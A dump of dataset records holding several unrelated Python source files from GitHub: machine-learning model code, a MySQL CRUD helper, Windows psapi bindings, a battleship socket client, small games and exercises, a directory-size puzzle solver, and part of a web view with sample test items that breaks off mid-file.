self.dnet:\n mask = self.mask_head(x_feat)\n up_depth = self.upsample_depth(depth, mask, self.downsample_ratio)\n return up_depth\n else:\n # if used as a part of MaGNet, do not upsample and also return the feature-map\n return depth, x_feat\n\n\n# D-Net\nclass DenseDepth(nn.Module):\n def __init__(self, n_bins, downsample_ratio, learned_upsampling, BN=True, dnet=True):\n super(DenseDepth, self).__init__()\n self.encoder = Encoder()\n self.decoder = Decoder(n_bins, downsample_ratio, learned_upsampling, BN, dnet)\n\n def forward(self, x):\n return self.decoder(self.encoder(x))\n\n def get_1x_lr_params(self): # lr/10 learning rate\n return self.encoder.parameters()\n\n def get_10x_lr_params(self): # lr learning rate\n return self.decoder.parameters()\n\n","repo_name":"baegwangbin/MaGNet","sub_path":"models/submodules/D_dense_depth.py","file_name":"D_dense_depth.py","file_ext":"py","file_size_in_byte":8952,"program_lang":"python","lang":"en","doc_type":"code","stars":178,"dataset":"github-code","pt":"78"} +{"seq_id":"75188672891","text":"import os\nimport inspect\nimport sys\n\ninit_file = open('linklib\\\\__init__.py')\nutils_file = open('linklib\\\\utils.py')\nconnects_file = open(\"linklib\\\\connects.py\")\n\nprint('copyng files')\nfiles = {\n \"init\":init_file.read(),\n \"utils\":utils_file.read(),\n \"connects\":connects_file.read()\n}\n\ninit_file.close()\nutils_file.close()\nconnects_file.close()\n\ndef get_libdir():\n if not('LIB' in os.environ):\n os_dir = inspect.getfile(os)\n os_dir += '\\\\site-packages\\\\'\n return os_dir \n else:\n return os.environ['LIB'] + '\\\\site-packages\\\\'\n\nprint('installing...')\ndir = f'{get_libdir()}\\\\linklib'\nos.makedirs(f'{dir}',exist_ok=True)\ninit_file = open(dir + '\\\\__init__.py','w')\nutils_file = open(dir + '\\\\utils.py','w')\nconnects_file = open(dir + '\\\\connects.py','w')\n\nprint('extracting...')\ninit_file.write(files['init'])\nutils_file.write(files['utils'])\nconnects_file.write(files['connects'])\n\nprint('succes!!!')\n\n","repo_name":"Venitocrack/linklib","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12522592201","text":"#############################\n# Author(s): Josh Cullings #\n# James Eaton #\n# #\n# Date: 9/23/2019 #\n#########/###################\n\nimport socket as sc\nimport sys\nimport time\n\ndef player(host, port, x, y): # i.e. the client\n socket = sc.socket()\n socket.connect((host, port))\n\n socket.send(('200 x='+str(x)+'&y='+str(y)).encode())\n\n result = socket.recv(1024).decode()\n print(result)\n \n with open(\"opponent_board.txt\") as f:\n opponent_board = f.read().splitlines()\n \n file = []\n newFile = []\n for i in range(0,10):\n for j in range (0,10):\n newFile.append(opponent_board[i][j])\n\n file.append(newFile)\n newFile = []\n\n if(result != '400'):\n x = int(x)\n y = int(y)\n opponent_board = file\n \n opponent_out = open(\"opponent_board.txt\", 'w')\n\n if(len(result) > 5):\n if(result[8] == '1'):\n opponent_board[x][y] = 'X'\n\n elif(result[8] == '0'):\n opponent_board[x][y] = 'O'\n\n for i in range(0,10):\n opponent_out.write(''.join(opponent_board[i]))\n opponent_out.write(\"\\n\")\n\n socket.close()\n \n print('\\n 0 1 2 3 4 5 6 7 8 9')\n for i in range(0,10):\n print(str(i)+' '+str(' '.join(opponent_board[i])))\n\nif __name__ == '__main__':\n try:\n host = str(sys.argv[1])\n port = int(sys.argv[2])\n x = sys.argv[3]\n y = sys.argv[4]\n \n player(host, port, x, y)\n except:\n print(\"Please enter the correct parameters\")\n\n#########################################################################################################\n# References: ` #\n# https://medium.com/podiihq/networking-how-to-communicate-between-two-python-programs-abd58b97390a #\n# #\n#########################################################################################################\n","repo_name":"cullingsj/Networks","sub_path":"PA1/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12833101660","text":"def d_mi_m(d_mil): #função que converte milhas em metros\r\n d_m = d_mil* 1610 #equação para converter milhas em metros\r\n return d_m #comando para retornar o valor em metros\r\n\r\ndef d_m_mi(d_m): #função para converter metros em milhas\r\n d_mil = d_m / 1610\r\n return d_mil\r\n\r\ndef t_h_s(h): #função para converter horas em segundos\r\n t_s = t_h * 3600\r\n return t_s\r\n\r\ndef t_s_h(s): #função que converte segundos em horas\r\n t_h = t_s/3600\r\n return t_h\r\n\r\n\r\n#Exercício da aula 1\r\n\r\nt = 43.5 * 60 #tempo dado em segundos\r\nd = 10*1000 #distância dada em metros\r\n\r\nd2_mil = d_m_mi(d) #aplica a função na variável d\r\nt_h2 = t_s_h(t) #aplica a função na variável t\r\n\r\nt_mil_h = (t_h2) / (d2_mil) #equação para o tempo médio por milha em horas\r\nv_mil_h = 1/t_mil_h #equação para achar a velocidade média em milhas por hora\r\n\r\nprint('A velocidade média em milhas por hora é:', v_mil_h)\r\nprint('O tempo médio por milha em hora é:', t_mil_h)\r\n\r\n\r\n#Exercício da aula 3\r\n\r\nd3_mil = 4 #distância dada em milhas\r\nt_h3 = 0.5 #tempo dado em horas\r\n\r\nd2_m = d_mi_m(d3_mil) #aplica a função na variável d3_mil\r\nd_km = d2_m / 1000 #transforma d2_m em km\r\n\r\nv_med = d_km / t_h3 #velocidade média em km/h\r\nt_med = 1/ v_med #tempo médio por km em horas\r\n\r\nprint('A velocidade média em km/h é:', v_med)\r\nprint('O tempo médio por km em horas é:', t_med)\r\n","repo_name":"AnnaPaulaM/Exerc-cios-Python","sub_path":"Exercício_4.py","file_name":"Exercício_4.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"21554853623","text":"import mysql.connector\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nmydb = mysql.connector.connect(\n host=os.getenv(\"HOST_DB\"),\n user=os.getenv(\"USER_DB\"),\n password=os.getenv(\"PASS_DB\"),\n database=os.getenv(\"DATABASE\")\n)\n\ncursor = mydb.cursor()\n\ndef checkExistsTable():\n cursor.execute(\"SELECT * FROM information_schema.tables WHERE table_name = 'products'\")\n value = cursor.fetchall()\n if(len(value) < 1):\n cursor.execute(\"CREATE TABLE products(id INT PRIMARY KEY AUTO_INCREMENT, name VARCHAR(255) NOT NULL, section VARCHAR(255) NOT NULL, price DECIMAL(6,2) NOT NULL, available INT(4) DEFAULT 1)\")\n\ndef addNewProduct(name, section, price, available):\n cursor.execute(\"INSERT INTO products (name, section, price, available) VALUES(%s, %s, %s, %s)\", (name, section, price, available))\n mydb.commit()\n return cursor.lastrowid\n\ndef getProducts(id):\n if id > 0:\n cursor.execute(\"SELECT JSON_OBJECT('id', id, 'name', name, 'section', section, 'price', price, 'available', available) FROM products WHERE id = {}\".format(id))\n return cursor.fetchone()\n else:\n cursor.execute(\"SELECT JSON_OBJECT('id', id, 'name', name, 'section', section, 'price', price, 'available', available) FROM products\")\n return cursor.fetchall()\n\ndef delProduct(id):\n cursor.execute(\"DELETE FROM products WHERE id = %s\", (id,))\n mydb.commit()\n\ndef updateProduct(id, new):\n if new['name']:\n cursor.execute(\"UPDATE products SET name = %s WHERE id = %s\", (new['name'], id,))\n if new['section']:\n cursor.execute(\"UPDATE products SET section = %s WHERE id = %s\", (new['section'], id,))\n if new['price']:\n cursor.execute(\"UPDATE products SET price = %s WHERE id = %s\", (new['price'], id,))\n if new['available']:\n cursor.execute(\"UPDATE products SET available = %s WHERE id = %s\", (new['available'], id,))\n mydb.commit()","repo_name":"szHeron/CRUD-API","sub_path":"dbmanager.py","file_name":"dbmanager.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2713176401","text":"#Embedded file name: dropbox/win32/psapi.py\nimport ctypes\nfrom ctypes import c_void_p, POINTER\nfrom ctypes.wintypes import DWORD, BOOL, HANDLE\nfrom dropbox.debugging import ReprStructure\nfrom .kernel32 import GetLastError, win_strerror\nSIZE_T = c_void_p\n\nclass PROCESS_MEMORY_COUNTERS(ReprStructure):\n _fields_ = [('cb', DWORD),\n ('PageFaultCount', DWORD),\n ('PeakWorkingSetSize', SIZE_T),\n ('WorkingSetSize', SIZE_T),\n ('QuotaPeakPagedPoolUsage', SIZE_T),\n ('QuotaPagedPoolUsage', SIZE_T),\n ('QuotaPeakNonPagedPoolUsage', SIZE_T),\n ('QuotaNonPagedPoolUsage', SIZE_T),\n ('PagefileUsage', SIZE_T),\n ('PeakPagefileUsage', SIZE_T)]\n\n\n_psapi = ctypes.windll.psapi\ntry:\n GetProcessMemoryInfo = _psapi.GetProcessMemoryInfo\n GetProcessMemoryInfo.argtypes = [HANDLE, POINTER(PROCESS_MEMORY_COUNTERS), DWORD]\n GetProcessMemoryInfo.restype = BOOL\nexcept:\n pass\n\ntry:\n _EnumProcesses = _psapi.EnumProcesses\n _EnumProcesses.argtypes = [POINTER(DWORD), DWORD, POINTER(DWORD)]\n _EnumProcesses.restype = BOOL\nexcept:\n pass\n\ndef EnumProcesses():\n cur_pids = 100\n size_of_dword = ctypes.sizeof(DWORD)\n while True:\n pids = (DWORD * cur_pids)()\n bytes_allocated = cur_pids * size_of_dword\n bytes_returned = DWORD(0)\n if not _EnumProcesses(pids, bytes_allocated, ctypes.byref(bytes_returned)):\n win_errno = GetLastError()\n raise WindowsError(win_errno, win_strerror(win_errno))\n if bytes_returned.value != bytes_allocated:\n break\n cur_pids *= 2\n\n return pids[:bytes_returned.value / size_of_dword]\n","repo_name":"bizonix/DropBoxLibrarySRC","sub_path":"pyc_decrypted/latest/dropbox/win32/psapi.py","file_name":"psapi.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"73969894330","text":"#Coding project #1 Goal: make a decent keyboard buying simulator project with 300 lines of code.\r\n\r\n#imports from python libraries or other files inside this project\r\nimport random\r\nimport time\r\n\r\nswitches = {\r\n 'Linear': ['Cherry Reds', 'Banana Splits', 'Tangerines', 'Alpacas', 'NovelKey Creams', 'Tealios', 'Durock Linears'], \r\n 'Tactile': ['Cherry Browns', 'Kiwis', 'Holy Pandas', 'Boba 4UT', 'Zealios', 'Durock Tactiles'],\r\n'Silents': ['Roseilos', 'Cherry MX Silent', 'Zilents', 'Silent Alpacaas']\r\n}\r\n\r\nkeyboard_name_list = []\r\nclass Keyboard(object):\r\n def __init__(self, layout, pcb, plate, switches):\r\n self.layout = layout\r\n self.pcb = pcb\r\n self.plate = plate\r\n self.switches = switches\r\n \r\n def __repr__(self):\r\n return ('Important tools in a keyboard: %ss, the %s, the %s, and most importantly the %s and how they sound!') % (self.layout, self.pcb, self.plate, self.switches)\r\n\r\n#Area of random generators\r\n\r\ndef layout():\r\n layout_list = [60, 65, 75, \"TKL\", \"Full-sized\", \"board\", \r\n \" Alice\"]\r\n\r\n return (random.choice(layout_list))\r\n\r\n\r\n#random word generator\r\ndef random_words():\r\n word_list = [\"Love\", \"Queen\", \"King\", \"Ace\", \"Joker\", \"Mental\", \"Atlas\", \"Mr. Suit\", \"Cyber\", \"Oni\", \"Hanja\", \"Wind\", \"Honey\", \"Bakeneko\", \"Wolf\", \"Galaxy\", \"Bubble\", \"Glorious\", \"Cafe\", \"Star\", \"Adept\", \"Nightmare\", \"Shadow\", \"Angel\", \"Unikorn\", \"Jane\", \"Dragon\", \"Play\", \"Focus\", \"Viking\", \"Archon\", \"Satisfaction\", \"Blade\", \"Python\", \"Comet\", \"Mind\", \"Destruction\", \"Glacier\", \"Inferno\", \"Nature\", \"Blank\"]\r\n generate_words = word_list.copy()\r\n random.shuffle(generate_words)\r\n return generate_words[0]\r\n\r\nbuild_keyboard = Keyboard(\"layout\", \"PCB\", \"plate\", \"switches\")\r\nstart = input(\"Welcome to the world of keyboards. Would you like an introduction?(Y/N)\")\r\nwhile start.upper() != 'Y' and start.upper() != 'N':\r\n start = input(\"Error: unacceptable input, try again. (Y/N)\")\r\n\r\nif start.upper() == 'Y':\r\n print(\"Great! Let me get your started with the important areas of a keyboard\")\r\n time.sleep(1)\r\n print (build_keyboard)\r\n\r\nif start.upper() == 'N':\r\n print(\"Well you must be a recurring user here!. welcome back! Lets get you to the main lobby!\")\r\n time.sleep(1) \r\n \r\n#Decide what areas to go into\r\n\r\nkeyboard_Rooms = ['Shop', 'Live Events', 'Inventory', 'News', 'Exit']\r\nkeyboard_inventory = ['Basic keyboard (Prebuilt, Membrane)']\r\nunbuilt_keyboard_inventory = []\r\nswitch_inventory = []\r\nprint(\"\\nSo... we are in the main lobby. Right now this code is in development. so we have \\\"Shop\\\" \\\"Live Events\\\" \\\"Inventory\\\" \\\"News\\\", \\\"Build Keyboard\\\" and if you decide you are done. Type in \\\"Exit\\\"\")\r\nchoose_room = input(\"\\nHere we are! Now press enter to continue!\")\r\nwhile choose_room.title() != 'Exit':\r\n choose_room = input(\"\\nChoose a room!\")\r\n if choose_room.title() != 'Shop' and choose_room.title() != 'News' and choose_room.title() != 'Inventory' and choose_room.title() != 'Live Events' and choose_room.title() != 'Exit' and choose_room.title() != 'Build Keyboard':\r\n continue\r\n if choose_room.title() == 'Exit':\r\n print(\"Well then... Goodbye! See you around~\")\r\n break\r\n\r\n if choose_room.title() == 'News':\r\n pass\r\n continue\r\n\r\n if choose_room.title() == 'Build Keyboard':\r\n if unbuilt_keyboard_inventory == [] or switch_inventory == []:\r\n print(\"You don't have the parts to build a keyboard\")\r\n continue\r\n\r\n if choose_room.title() == 'Live Events':\r\n print('There are no live events at the moment. Sorry!')\r\n continue\r\n\r\n if choose_room.title() == 'Inventory':\r\n count = 0\r\n print(\"Keyboard Inventory\\n\" + str(keyboard_inventory))\r\n\r\n print(\"\\nUnbuilt Keyboards\\n\" + str(unbuilt_keyboard_inventory))\r\n\r\n print(\"\\n Switch Inventory\\n\" + str(switch_inventory))\r\n count += 1\r\n if count == 1:\r\n continue\r\n\r\n if choose_room.title() == 'Shop':\r\n time.sleep(1)\r\n print(\"\\nWelcome to the shop\\n\")\r\n choose_shop_room = input(\"Choose an area to shop! (Keyboard Kit, Switches, Stabilizers, Keycaps, or Return)\")\r\n\r\n while choose_shop_room.title() != 'Keyboard Kit' and choose_shop_room.title() != 'Switches' and choose_shop_room.title() != 'Stabilizers' and choose_shop_room.title() != 'Keycaps' and choose_shop_room.title() != 'Return':\r\n choose_shop_room = input(\"Choose an area to shop! (Keyboard Kit, Switches, Stabilizers, Keycaps or Return.)\")\r\n\r\n if choose_shop_room.title() == 'Keyboard Kit':\r\n keyboards_available = random.randint(0, 5)\r\n\r\n for i in range(0, keyboards_available):\r\n keyboard_name = random_words()\r\n keyboard_layout = layout()\r\n keyboard_name_list.append(keyboard_name + str(keyboard_layout))\r\n \r\n if keyboards_available == 0:\r\n print(\"\\nWe have no keyboards available. Please come back later.\")\r\n continue\r\n \r\n elif keyboards_available == 1:\r\n print('\\n We have only ' + str(keyboards_available) + ' keyboard available today. \\n')\r\n for keyboard in keyboard_name_list:\r\n print(keyboard)\r\n buy_keyboard = input(\"\\nWould you like to buy the %s? (Y/N)\" % (keyboard))\r\n if keyboard in unbuilt_keyboard_inventory:\r\n keyboard_name_list.remove(keyboard)\r\n \r\n if keyboard not in unbuilt_keyboard_inventory:\r\n keyboard_name_list.remove(keyboard)\r\n \r\n if buy_keyboard.upper() == 'Y':\r\n count = keyboards_available\r\n for bought_keyboard in buy_keyboard:\r\n unbuilt_keyboard_inventory.append(keyboard)\r\n\r\n if buy_keyboard.upper() == 'N':\r\n count = keyboards_available\r\n print(\"\\n\")\r\n count -= 1\r\n \r\n if count == 0:\r\n for keyboard in keyboard_name_list:\r\n if keyboard_name_list not in unbuilt_keyboard_inventory:\r\n keyboard_name_list.remove(keyboard)\r\n continue\r\n \r\n \r\n if keyboards_available > 1:\r\n count = keyboards_available\r\n print(\"\\nWe have \" + str(keyboards_available) + \" keyboards available today. \\n\")\r\n time.sleep(1)\r\n for keyboard in keyboard_name_list:\r\n print(keyboard)\r\n buy_keyboard = input(\"\\nWould you like to buy the %s? (Y/N)\\n\" % (keyboard))\r\n \r\n while buy_keyboard.upper() != 'Y' and buy_keyboard.upper() != 'N':\r\n buy_keyboard = input(\"\\nWould you like to buy the %s? (Y/N)\\n\" % (keyboard))\r\n \r\n if buy_keyboard.upper() == 'Y':\r\n for bought_keyboard in buy_keyboard:\r\n unbuilt_keyboard_inventory.append(keyboard)\r\n print(\"\\n\")\r\n count -= 1\r\n \r\n if buy_keyboard.upper() == 'N':\r\n print(\"\\n\")\r\n count -= 1\r\n\r\n if count is 0:\r\n rejected_keyboards = []\r\n accepted_keyboards = []\r\n \r\n for keyboards in keyboard_name_list:\r\n if keyboards in unbuilt_keyboard_inventory:\r\n accepted_keyboards.append(keyboards)\r\n \r\n for keyboards in accepted_keyboards:\r\n if keyboards in keyboard_name_list:\r\n keyboard_name_list.remove(keyboards)\r\n \r\n for keyboards in keyboard_name_list:\r\n if keyboards not in unbuilt_keyboard_inventory:\r\n rejected_keyboards.append(keyboards)\r\n \r\n for keyboards in rejected_keyboards:\r\n if keyboards in keyboard_name_list:\r\n keyboard_name_list.remove(keyboards)\r\n\r\n if choose_shop_room.title() == 'Switches':\r\n time.sleep(1)\r\n print('\\nWelcome to the switch shop! we have several types of switches')\r\n choose_switch_type = input('Choose What switch type you want to buy. [Linears, Tactiles, Silents]')\r\n\r\n while choose_switch_type.title() != 'Linears' and choose_switch_type.title() != 'Tactiles' and choose_switch_type.title() != 'Silents':\r\n choose_switch_type = input(\"Choose a switch type from the list...['Linears', 'Tactiles', 'Silents']\")\r\n if choose_switch_type == 'Clicky':\r\n print(\"Do not ever speak of those ungodly switches again!\")\r\n continue\r\n \r\n if choose_switch_type.title() == 'Linears':\r\n print(\"\\nLinear switches that we have available are: \\n\")\r\n for linearSwitches in switches['Linear']: \r\n print(linearSwitches)\r\n \r\n add_switches = input(\"Pick a switch from the list.\")\r\n if add_switches.title() not in switches['Linear']:\r\n add_switches = input(\"Pick a switch from the list.\")\r\n\r\n if add_switches.title() == 'Cherry Reds' or add_switches.title() == 'Banana Splits' or add_switches.title() == 'Tangerines' or add_switches.title() == 'Alpacas':\r\n switches_amount = int(input(\"How many \" + str(add_switches) + \" would you like? (50, 70, 90, 110)\"))\r\n while switches_amount != 50 and switches_amount != 70 and switches_amount != 90 and switches_amount != 110:\r\n switches_amount = int(input(\"How many switches would you like?\"))\r\n\r\n if switches_amount == 50 or switches_amount == 70 or switches_amount == 90 or switches_amount == 110:\r\n switch_inventory.append(add_switches.title() + ', x' + str(switches_amount))\r\n if add_switches.title() == 'Cancel' or add_switches.title() == 'Return':\r\n pass\r\n continue\r\n\r\n \r\n if choose_shop_room.title() == 'Return':\r\n pass\r\n continue\r\n ","repo_name":"NexnaNet/Beginner-Code","sub_path":"keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":10215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40182772815","text":"\nimport torch\nimport numpy as np\nfrom pathlib import Path\n\nfrom omegaconf import OmegaConf\nfrom app.mmf.mmf.models.interfaces.qlarifais import QlarifaisInterface\n\nfrom app.mmf.mmf.models.base_model import BaseModel\nfrom app.mmf.mmf.common.registry import registry\nfrom app.mmf.mmf.utils.checkpoint import load_pretrained_model\nfrom app.mmf.mmf.utils.text import *\n\nfrom app.mmf.mmf.utils.build import (\n build_image_encoder,\n build_text_encoder,\n build_graph_encoder,\n build_fusion_module,\n build_classifier,\n build_attention_module\n )\n\n# mmf_run config='configs/experiments/baseline/mul.yaml' model=qlarifais dataset=okvqa run_type=train_val\n\n@registry.register_model(\"qlarifais\")\nclass Qlarifais(BaseModel):\n\n def __init__(self, config):\n super().__init__(config)\n self.build()\n\n @classmethod\n def from_pretrained(cls, model_name, *args, **kwargs):\n model = super().from_pretrained(model_name, *args, **kwargs)\n config = load_pretrained_model(model_name)[\"full_config\"]\n OmegaConf.set_struct(config, True)\n return QlarifaisInterface(model, config)\n\n @classmethod\n def config_path(cls):\n # Relative to user dir root\n return \"configs/models/qlarifais/defaults.yaml\"\n\n def build(self):\n\n # building general modules\n self.vision_module = build_image_encoder(self.config.image_encoder)\n self.language_module = build_text_encoder(self.config.text_encoder)\n self.fusion_module = build_fusion_module(self.config.fusion)\n self.classifier = build_classifier(self.config.classifier)\n\n # external knowledge\n self.graph_encoder = build_graph_encoder(self.config.graph_encoder)\n\n # attention\n if self.config.attention.use:\n # initiating attention module\n self.attention_module = build_attention_module(self.config.attention.params)\n\n def forward(self, sample_list):\n\n # --- QUESTION EMBEDDINGS ---\n # text input features will be in \"input_ids\" key\n question = sample_list[\"input_ids\"]\n # get the text and image features from the encoders\n question_features = self.language_module(question)\n # IMAGE FEATURES\n image = sample_list[\"image\"]\n image_features = self.vision_module(image) # [batch_size, i_dim, sqrt(max_features), sqrt(max_features)] # TODO: ?\n\n # --- GRAPH EMBEDDINGS ---\n if self.config.graph_encoder.use:\n graph_features = self.graph_encoder(sample_list['tokens']) # [batch_size, g_dim]\n\n\n # --- ATTENTION ---\n if self.config.attention.use:\n # getting correct input shape\n image_features = image_features.flatten(2,3).permute(0, 2, 1) # [batch_size, num_features, i_dim]\n # extracting attention based on defined attention mechanism\n if self.config.attention.type == 'question_guided':\n attention = self.attention_module(image_features, question_features)\n if self.config.attention.type == 'graph_guided':\n attention = self.attention_module(image_features, graph_features)\n if self.config.attention.type == 'question_graph_guided':\n attention = self.attention_module(image_features, question_features, graph_features)\n # [batch_size, num_features, 1]\n # weighted average of image features\n image_features = (attention * image_features).sum(1) # [batch_size, i_dim]\n # if not using attention\n else:\n if self.config.image_encoder.resize == 'average_pooling':\n # average pool K features of size 2048\n image_features = torch.mean(image_features, dim = (2,3)) # [batch_size, i_dim]\n\n\n # --- FUSION ---\n # type of fusion based on inputs\n if self.config.graph_encoder.use:\n fused_features = self.fusion_module(image_features, question_features, graph_features)\n else:\n fused_features = self.fusion_module(image_features, question_features)\n # [batch_size, answer_vocab_dim]\n\n # --- CLASSIFICATION ---\n # embeddings\n logits = self.classifier(fused_features)\n # average embedded annotator answer for type contrastive loss\n avg_embedded_answers = self.graph_encoder(sample_list['answers'])\n output = {\"output_type\": self.config.classifier.output_type, \"avg_embedded_answers\": avg_embedded_answers,\n \"scores\": logits}\n return output\n","repo_name":"PhillipHoejbjerg/WebVQA","sub_path":"app/mmf/mmf/models/qlarifais.py","file_name":"qlarifais.py","file_ext":"py","file_size_in_byte":4524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19746724460","text":"import re\n\nf = open(\"data.txt\", \"r\")\nbashhistory=f.read().splitlines()\n# bashhistory=['$ cd /',\n# '$ ls',\n# 'dir a',\n# '14848514 b.txt',\n# '8504156 c.dat',\n# 'dir d',\n# '$ cd a',\n# '$ ls',\n# 'dir e',\n# '29116 f',\n# '2557 g',\n# '62596 h.lst',\n# '$ cd e',\n# '$ ls',\n# '584 i',\n# '$ cd ..',\n# '$ cd ..',\n# '$ cd d',\n# '$ ls',\n# '4060174 j',\n# '8033020 d.log',\n# '5626152 d.ext',\n# '7214296 k']\n\nclass LsCmd:\n pass\n\ndef get_cd_target(line):\n m_cd = re.search('\\$ cd (.*)$', line)\n if m_cd is not None:\n return(m_cd.group(1))\n elif (line == '$ ls'):\n return None #LsCmd()\n else:\n warning(\"oops\")\n\n# I could just have a vector of pointers, but this is what I started with...\ndef get_pointer_from_dirstack(dirstack, filemap):\n pointer = filemap\n for dir in dirstack:\n pointer = pointer[dir]\n return pointer\n\ndef update_all_dirs_size(dir_stack,filesize):\n for pointer in dir_stack:\n if \"__SIZE__\" in pointer.keys():\n pointer[\"__SIZE__\"]+=filesize\n else:\n pointer[\"__SIZE__\"]=filesize\n\ndef shell2dict(shell_hist):\n dir_stack=[]\n filemap={\"/\":{}}\n pointer=filemap\n\n for line in shell_hist:\n # print(\"###\",\"'\"+line+\"'\")\n # interpret cd commands\n if line[0] == \"$\":\n cd_target=get_cd_target(line)\n if(cd_target is not None):\n if(cd_target == \"..\"):\n #dir_stack.pop()\n #deprecated# pointer=get_pointer_from_dirstack(dir_stack, filemap)\n dir_stack.pop()\n pointer=dir_stack[-1]\n else:\n #deprecated# dir_stack.append(cd_target)\n pointer=pointer[cd_target]\n dir_stack.append(pointer)\n # create directories\n elif line.startswith(\"dir\"):\n dirname_match = re.search('dir (.*)$', line)\n dirname=dirname_match.group(1)\n if dirname not in pointer.keys():\n pointer[dirname]={}\n # create files\n else:\n m_size = re.search('([0-9]+) (.*)$', line)\n if(m_size is not None):\n filesize=int(m_size.group(1))\n filename=m_size.group(2)\n # print(\"file\",filename,\"=\",filesize)\n pointer[filename]=filesize\n else:\n warning(\"oops\")\n update_all_dirs_size(dir_stack,filesize)\n \n #print(\"stack depth\",len(dir_stack))\n #print(pointer)\n return filemap\n\nfilemap=shell2dict(bashhistory)\nprint(filemap)\n\ndef get_part1_heuristic(rest_of_disk):\n retSum=0\n for name in rest_of_disk.keys():\n pointer=rest_of_disk[name]\n if isinstance(pointer,dict):\n retSum+=get_part1_heuristic(pointer)\n elif name == \"__SIZE__\":\n if pointer < 100000:\n retSum+=pointer\n return retSum\n\nprint(\"Part 1:\",get_part1_heuristic(filemap))\nmax_used_disk=40000000\ncur_used_disk=filemap[\"/\"][\"__SIZE__\"]\ndiff_to_delete=cur_used_disk-max_used_disk\nprint(\"Used disk:\",cur_used_disk)\nprint(\"Need to delete:\",diff_to_delete)\n\ndef find_best_match_dir(rest_of_disk,needed_space,stack):\n this_dir_size=rest_of_disk[\"__SIZE__\"]\n\n if (this_dir_sizeWhich model of the garden represents four rectangular sections for planting vegetables according to the class plan?

 

Each square on the model represents 1 square foot.

',\n 'answers': [\n {\n 'name': \"Option A\",\n 'value': '

',\n 'order': 1\n },\n {\n 'name': \"Option B\",\n 'value': '

',\n 'order': 2\n },\n {\n 'name': \"Option C\",\n 'value': '

',\n 'order': 3\n },\n {\n 'name': \"Option D\",\n 'value': '

',\n 'order': 4\n },\n\n ]\n }\n data['2'] = {\n 'js_files': \"/ari/js/core.js\",\n 'send_data': \"/api/score\",\n 'identifier': 1448,\n 'div': 'container',\n 'item_type': \"multiple_choice\",\n 'item_subject': \"MATH\",\n 'item_version': 8,\n 'ari_version': 1,\n 'order': 2,\n 'description': \"Cloned from ITS 766\",\n 'concept': \"What Knowledge Do Students Need to Understand This Concept?\",\n 'prompt': '

Coffee costs $2 per pound at a coffee shop. Which graph represents this situation?

',\n 'answers': [\n {\n 'name': \"Option A\",\n 'value': '

',\n 'order': 1\n },\n {\n 'name': \"Option B\",\n 'value': '

',\n 'order': 2\n },\n {\n 'name': \"Option C\",\n 'value': '

',\n 'order': 3\n },\n {\n 'name': \"Option D\",\n 'value': '

',\n 'order': 4\n } \n ]\n }\n\n response = Response(content_type='text/json')\n response.text = json.dumps(data[current_order])\n return response\n\n\ndef itemSave(context, request):\n response = Response(content_type='text/json')\n response.text = json.dumps({'status': 1})\n return response\n\ndef convertToCSVLegacy(context, request):\n\n students = json.loads(request.POST['json_data'])\n\n data = {\n 'Student Last Name': [],\n 'Student First Name': [],\n 'SSID (consistent with TIDE)': [],\n 'Grade': [],\n 'Educator(s) completing ISAAP': [],\n 'Teacher of Record': [],\n 'School ID': [],\n 'School Name': [],\n 'Abacus': [],\n '*Alternate Response Options (including any external devices/assistive technologies)': [],\n 'American Sign Language for ELA Listening and Math Items': [],\n 'Bilingual Dictionary for ELA Full Writes (ET)': [],\n 'Braille': [],\n 'Calculator': [],\n 'Closed Captioning for ELA Listening Items': [],\n 'Color Contrast (EMBEDDED)': [],\n '*Color Contrast (NON-EMBEDDED)': [],\n 'Color Overlays': [],\n '*Magnification': [],\n 'Masking': [],\n 'Multiplication Table': [],\n 'Noise Buffers': [],\n '*Print on Demand': [],\n '*Read Aloud for ELA Reading Passages Grades 6-8 and 11': [],\n '*Read Aloud for Math and ELA Items': [],\n '*Scribe': [],\n '*Scribe (for ELA non-writing items and Math items)': [],\n 'Separate Setting': [],\n '*Speech-to-text': [],\n '*Stacked Translations for Math': [],\n '*Text-to-speech for ELA Reading Passages Grades 6-8 and 11': [],\n '*Text-to-speech for Math and ELA Items': [],\n 'Translated Text Directions': [],\n 'Translated Test Directions for Math': [],\n '*Translation Glossaries for Math (ET) (EMBEDDED)': [],\n 'Translation Glossaries for Math (ET) (NON-EMBEDDED)': [],\n }\n\n for el in students:\n data['Student Last Name'].append(el['lastname'])\n data['Student First Name'].append(el['firstname'])\n data['SSID (consistent with TIDE)'].append(el['ssid'])\n data['Grade'].append(el['grade']['selected']['value'])\n data['Educator(s) completing ISAAP'].append('')\n data['Teacher of Record'].append(el['teacher'])\n data['School ID'].append(el['school_id'])\n data['School Name'].append(el['school_name'])\n\n try:\n data['Abacus'].append(el['accommodations']['11']['selected']['value'])\n except (NameError, TypeError):\n data['Abacus'].append('')\n\n try:\n data['*Alternate Response Options (including any external devices/assistive technologies)'].append(el['accommodations']['9']['selected']['value'])\n except (NameError, TypeError):\n data['*Alternate Response Options (including any external devices/assistive technologies)'].append('')\n\n try:\n data['American Sign Language for ELA Listening and Math Items'].append(el['accommodations']['12']['selected']['value'])\n except (NameError, TypeError):\n data['American Sign Language for ELA Listening and Math Items'].append('')\n\n\n try:\n data['Bilingual Dictionary for ELA Full Writes (ET)'].append(el['accommodations']['13']['selected']['value'])\n except (NameError, TypeError):\n data['Bilingual Dictionary for ELA Full Writes (ET)'].append('')\n\n\n try:\n data['Braille'].append(el['accommodations']['10']['selected']['value'])\n except (NameError, TypeError):\n 